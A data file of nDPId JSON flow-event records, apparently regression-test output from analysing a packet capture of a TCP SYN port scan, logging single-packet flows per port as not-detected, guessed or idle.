-00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":794,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059736,"flow_last_seen":1278275059736,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5510,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":794,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059736,"flow_last_seen":1278275059736,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5510,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":861,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059846,"flow_last_seen":1278275059846,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5510,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":861,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059846,"flow_last_seen":1278275059846,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5510,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057743,"flow_last_seen":1278275057743,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1417,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057743,"flow_last_seen":1278275057743,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1417,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":73,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057885,"flow_last_seen":1278275057885,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1417,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":73,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057885,"flow_last_seen":1278275057885,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1417,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":920,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059896,"flow_last_seen":1278275059896,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9618,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":920,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059896,"flow_last_seen":1278275059896,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9618,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":977,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060005,"flow_last_seen":1278275060005,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9618,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":977,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060005,"flow_last_seen":1278275060005,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9618,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1317,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060491,"flow_last_seen":1278275060491,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":38292,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1317,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060491,"flow_last_seen":1278275060491,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":38292,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":351,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058780,"flow_last_seen":1278275058780,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3476,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":351,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058780,"flow_last_seen":1278275058780,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3476,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1380,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060591,"flow_last_seen":1278275060591,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":38292,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1380,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060591,"flow_last_seen":1278275060591,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":38292,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":392,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058905,"flow_last_seen":1278275058905,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3476,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":392,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058905,"flow_last_seen":1278275058905,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3476,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00652{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":181,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058280,"flow_last_seen":1278275058280,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1433,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"MsSQL-TDS","breed":"Acceptable","category":"Database"}} 
-00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":181,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058280,"flow_last_seen":1278275058280,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1433,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1651,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060904,"flow_last_seen":1278275060904,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":13722,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1651,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060904,"flow_last_seen":1278275060904,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":13722,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1288,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060438,"flow_last_seen":1278275060438,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":44442,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1288,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060438,"flow_last_seen":1278275060438,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":44442,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00653{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1777,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061107,"flow_last_seen":1278275061107,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1434,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"MsSQL-TDS","breed":"Acceptable","category":"Database"}} 
-00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1777,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061107,"flow_last_seen":1278275061107,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1434,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00652{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":234,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058406,"flow_last_seen":1278275058406,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1433,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"MsSQL-TDS","breed":"Acceptable","category":"Database"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":234,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058406,"flow_last_seen":1278275058406,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1433,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1362,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060540,"flow_last_seen":1278275060540,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":44442,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1362,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060540,"flow_last_seen":1278275060540,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":44442,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00653{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1880,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061212,"flow_last_seen":1278275061212,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1434,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"MsSQL-TDS","breed":"Acceptable","category":"Database"}} 
-00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1880,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061212,"flow_last_seen":1278275061212,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1434,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1720,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061006,"flow_last_seen":1278275061006,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":13722,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1720,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061006,"flow_last_seen":1278275061006,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":13722,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":919,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059896,"flow_last_seen":1278275059896,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":44443,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":919,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059896,"flow_last_seen":1278275059896,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":44443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":978,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060005,"flow_last_seen":1278275060005,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":44443,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":978,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060005,"flow_last_seen":1278275060005,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":44443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1335,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060493,"flow_last_seen":1278275060493,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":56737,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1335,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060493,"flow_last_seen":1278275060493,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":56737,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1643,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060903,"flow_last_seen":1278275060903,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":56738,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1643,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060903,"flow_last_seen":1278275060903,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":56738,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1410,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060596,"flow_last_seen":1278275060596,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":56737,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1410,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060596,"flow_last_seen":1278275060596,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":56737,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 